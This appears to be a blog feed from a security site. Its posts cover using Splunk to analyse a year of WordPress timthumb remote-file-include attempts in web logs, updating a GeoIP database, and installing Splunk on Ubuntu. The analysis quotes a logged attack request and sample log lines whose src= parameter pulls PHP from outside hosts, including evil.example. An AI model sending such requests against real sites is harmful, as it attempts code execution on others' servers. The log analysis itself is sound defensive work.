splunk – HackerTarget.com
https://hackertarget.com
Security Vulnerability Scanners and Assessments

There are no WordPress Timthumb Hackers in Mongolia
https://hackertarget.com/feed-splunk-timthumb-attacks/
Thu, 07 Feb 2013 12:40:45 +0000
What is Timthumb?

Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and Plugins. The code enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers, including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI) which allows an attacker to have the thumb.php code include additional code to execute PHP on the web server. An attacker attempts to use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday, my OSSEC host-based intrusion detection system alerted me to continued attempts at exploiting the timthumb vulnerability.

Example

Below is an attack example from my logs. Note the WordPress path being attempted, the theme name, and the ?src= parameter, whose value is the URL of the remote PHP code the attacker wants included.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempted attacks. They simply fill your web server log files with attempts to execute thumb.php on various common paths, each resulting in a 404 not found error.

What is Splunk?

If your job involves looking at logs, spend some cycles playing with the Splunk search engine. It is a commercial product but comes in a free version that allows you to consume 500MB of logs per day, which is great for ad-hoc analysis or small to mid-size projects.

To perform some simple analysis of my web server logs to view the frequency, sources and attempts to exploit this timthumb vulnerability, I have turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

[Figure: Timthumb events per month over 1 year]

To begin, I installed Splunk and fed it a single file. The file contained 12 months' worth of logs from my Nginx web server. I used grep to only feed in log entries that included thumb in the path and resulted in a 404 not found. In other words, every log event that I have in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts, the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was released in August 2011, there was a major jump in the number of attacks against my server from July 2012. The reason for the increased number of attempts appears to be an increase in the tested paths of the timthumb code (more known bad themes). These lists are then included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP APP it is a simple matter to determine where the attacks are coming from. Once you have the base lookup working, Splunk makes it easy to chart the results of the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country
This query shows the Top 20 countries for total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I take a closer look at the number of unique IP addresses by location. Instead of a simple chart, I use the Google Map APP that allows the geolocations to be plotted onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it is easy to see that all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes that are being attacked I used a regex on /wp-content/themes/ to get the theme path. Many of the attacked themes in the top 20 correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?<wptheme>[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes, I discovered some attacks were not "blind" attempts. They were targeted against my theme that I have on a non-standard path. This indicates my site was explicitly targeted either manually after extraction of the path from the HTML source of my page or by a script parsing the HTML for those attempts. 31 different IP addresses had a go at my non-default theme path. In the top 5, I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip
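As an added example (not code from the post or from HackerTarget), here is the same pipeline the Splunk searches above express, run in Python over raw access-log lines: the grep pre-filter for thumb.php requests that 404'd, the theme regex, the top IP / top theme counts, and the check for hits against the site's own non-default theme path. The log lines, host names and regexes are constructed for this example; the non-default theme path is the one from the post.

```python
import re
from collections import Counter

# Combined log format as nginx writes it. The regexes and the sample lines below are
# constructed for this example; they are not from the post or HackerTarget's tooling.
LOG_RE = re.compile(r'(?P<clientip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+) [^"]*" '
                    r'(?P<status>\d{3}) ')
THEME_RE = re.compile(r"wp-content/themes/(?P<wptheme>[\w\-]*)")  # same as the rex in the post
SRC_RE = re.compile(r"[?&]src=(?P<src>[^&\s]+)")                    # the remote-include URL

SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2013:18:33:28 +0000] "GET /wp-content/themes/suffusion/timthumb.php?src=http://evil.example/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Feb/2013:18:33:29 +0000] "GET /wp-content/themes/twentyten/thumb.php?src=http://evil.example/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Feb/2013:19:01:02 +0000] "GET /wp-content/themes/delegate2.3/functions/thumb.php?src=http://other.example/x.php HTTP/1.1" 404 36 "-" "curl/7.29"
192.0.2.44 - - [02/Feb/2013:19:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [02/Feb/2013:19:05:01 +0000] "GET /wp-content/themes/suffusion/timthumb.php?src=http://evil.example/wordpress.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""
OWN_THEME_PATH = "/wp-content/themes/delegate2.3/functions/thumb.php"  # the post's non-default path

def parse_line(line):
    """Return clientip/ts/uri/status for one access-log line, or None if it doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, own_theme_path=None):
    """The post's Splunk pipeline over raw lines: keep *thumb.php requests that 404'd,
    count them by source IP, theme and remote-include host, and flag IPs that hit the
    site's own non-default theme path (targeted, not blind). thumb.php requests that
    did NOT 404 are set aside: the file is actually present there, so check those first."""
    ips, themes, src_hosts, targeted, served = Counter(), Counter(), Counter(), set(), []
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        path = ev["uri"].split("?", 1)[0]
        if not path.lower().endswith("thumb.php"):
            continue
        if ev["status"] != "404":
            served.append((ev["clientip"], path, ev["status"]))
            continue
        ips[ev["clientip"]] += 1
        t = THEME_RE.search(path)
        if t:
            themes[t["wptheme"]] += 1
        s = SRC_RE.search(ev["uri"])
        if s:
            src_hosts[s["src"].split("/")[2] if "://" in s["src"] else s["src"]] += 1
        if own_theme_path and path == own_theme_path:
            targeted.add(ev["clientip"])
    return {"ips": ips, "themes": themes, "src_hosts": src_hosts,
            "targeted": targeted, "served": served}
```

The returned Counters give the post's "top 20" views via most_common(20); the served list is the one thing the grep-for-404 filter in the post throws away, and it is the first thing to look at on a server you think is patched.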

I have only scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, start playing, and you will not be disappointed. For those who are wary of the Splunk price tag for larger amounts of data, I suggest taking a look at ELSA and Graylog2. Both are open source log management systems that seem promising and are developing rapidly.


Update GeoIP data for Splunk App
https://hackertarget.com/update-geoip-data-for-splunk-app/
Wed, 06 Feb 2013 07:04:50 +0000
If you are using the GeoIP app for Splunk you will find that it has not been updated recently. The last update was June 2011. Following my recent post regarding the installation of Splunk on an Ubuntu based system I started to dig into this app and found that it is a simple matter to update the MaxMind GeoIP Lite database to the latest version.

Head over to the MaxMind website and grab the latest version of the GeoLiteCity.dat.gz file.

Download: http://dev.maxmind.com/geoip/geolite

Now uncompress the download with gzip.

gzip -d GeoLiteCity.dat.gz

If you take a look in /opt/splunk/etc/apps/maps/bin/ of your Splunk install you will see the version of the GeoLiteCity.dat file is August 20, 2011. Time to update it to the latest version.

cp GeoLiteCity.dat /opt/splunk/etc/apps/maps/bin/

Start searching Splunk with the latest GeoIP data from MaxMind. It really is that easy. 🙂
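The three steps above as one script, added here as an example rather than taken from the post: it refuses a truncated download, keeps a dated backup of the database currently in use, and swaps the new file in atomically so Splunk never reads a half-written one. The arguments are assumed: the .gz you downloaded from MaxMind and the app's bin directory (/opt/splunk/etc/apps/maps/bin on the post's install).

```shell
#!/bin/sh
# Added example, not from the post: refresh the GeoLiteCity.dat used by the Splunk
# maps app. Assumed arguments: the .gz downloaded from MaxMind and the app's bin dir
# (on the post's install that is /opt/splunk/etc/apps/maps/bin).
update_geoip_db() {
    gz="$1"
    dest_dir="$2"
    name=$(basename "$gz" .gz)          # GeoLiteCity.dat.gz -> GeoLiteCity.dat

    # A truncated download would silently break every geoip lookup; check it first.
    if ! gzip -t "$gz" 2>/dev/null; then
        echo "refusing to install: $gz is not a valid gzip file" >&2
        return 1
    fi

    # Keep the database that is currently in use so the change can be rolled back.
    if [ -f "$dest_dir/$name" ]; then
        cp "$dest_dir/$name" "$dest_dir/$name.$(date +%Y%m%d%H%M%S).bak" || return 1
    fi

    # Decompress to a temp file and rename so Splunk never reads a half-written
    # database; -c keeps the original .gz on disk for later reference.
    gzip -dc "$gz" > "$dest_dir/$name.tmp" && mv "$dest_dir/$name.tmp" "$dest_dir/$name"
}

# Show what is installed now; the post checks this date to spot the stale 2011 file.
list_geoip_db() {
    ls -l "$1"/GeoLiteCity.dat*
}
```

Usage: update_geoip_db ./GeoLiteCity.dat.gz /opt/splunk/etc/apps/maps/bin, then list_geoip_db /opt/splunk/etc/apps/maps/bin to confirm the new date and the .bak copy.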

Install Splunk on Ubuntu in 5 mins
https://hackertarget.com/install-splunk-ubuntu-in-5-mins/
Sat, 02 Feb 2013 04:37:14 +0000
Splunk is a powerful log database that can be used for the analysis of any sort of log data through its easy to use search engine. Security logs, Syslog, Web server logs, and Windows logs are just the beginning.

One of the great features of Splunk is that you can feed pretty much any log into it and start searching. Here at hackertarget.com we usually focus on Open Source security projects; Splunk is not open source but commercial, although it does have a free option that allows up to 500MB of data to be added to the system per day. For volumes larger than 500MB per day, the licensing costs start to add up. Splunk installation under Ubuntu is so easy that you can fire up an instance just to do ad-hoc analysis of static log files.

Open Source Splunk Alternative

If you are interested in a purely Open Source log search engine, take a look at ELSA - Enterprise Log Search and Archive. This is a relatively new project that is making good progress. It has been included on the latest Security Onion release.

Another Open Source log management option is Graylog2. I am yet to test or explore this alternative to Splunk but I have read some good reviews and it looks promising.

Download Splunk for Ubuntu

Splunk runs on a wide range of computing platforms including Windows, Linux, FreeBSD, OSX, Solaris, AIX and even HPUX.

http://www.splunk.com/download?r=header

We are after the Linux download option, specifically the .deb file as Ubuntu uses the Debian based .deb package format for binary installs. It is a matter of selecting either 32bit or 64bit and then downloading the .deb file.

Not sure whether your Ubuntu is 32bit or 64bit? The easiest way to check is to run uname -a in a terminal window: x64 (x86_64) in the output indicates 64bit, while i686 or i386 indicates a 32 bit install.

The 32 bit package is about 35.5MB, and you will need to sign up for a Splunk account to begin the download. It is worth creating an account you will remember, as this same account will be used to download additional plugins (apps) from the Splunk site.

Once the download is complete you can install it with the following dpkg command as seen in the output below:

fred@x-wing1:~$ sudo dpkg -i Downloads/splunk-5.0.1-143156-linux-2.6-intel.deb 
[sudo] password for fred: 
Selecting previously unselected package splunk.
(Reading database ... 239507 files and directories currently installed.)
Unpacking splunk (from .../splunk-5.0.1-143156-linux-2.6-intel.deb) ...
Setting up splunk (5.0.1-143156) ...
----------------------------------------------------------------------
Splunk has been installed in:
        /opt/splunk

To start Splunk, run the command:
        /opt/splunk/bin/splunk start


To use the Splunk Web interface, point your browser at:
    http://x-wing1:8000


Complete documentation is at http://docs.splunk.com/Documentation/Splunk
----------------------------------------------------------------------

Yes, it is that easy, no dependencies or mucking around. Now it's time to start the Splunk server.

sudo /opt/splunk/bin/splunk start

After some initial setup, you should see:

The Splunk web interface is at http://x-wing1:8000

Login and change your password. You now have your very own Splunk server, just like the cool kids. 🙂

Feed Splunk Data and Search!

Start getting data into the system and then you can search on it. Data can be input from simple files for one-off analysis, Splunk can read known log files, or it can listen on a port like a syslog server. It is very flexible: for example, with Splunk listening on a TCP port you could use netcat to pipe a file over the network into the Splunk server, or have a syslog server forward some of its logs to the Splunk instance. This leaves your existing syslog infrastructure intact for archival purposes while you also have the Splunk instance for easy analysis.

Now you are at the point where it depends on your network and requirements, so think about how you are going to use it, feed it some data and start searching for stuff. The stuff could be configuration issues, errors, utilization trends or security events. If you want to do some easy testing, just grab a web server log file or other log and feed it in directly with the file or directory input option.

This video is a good introduction to performing Splunk log searches and pulling relevant information from your data.

While I suspect most people will find value from the first day, as you explore the capabilities of the Splunk search engine you will keep finding stuff; it's a rabbit hole for systems administrators.
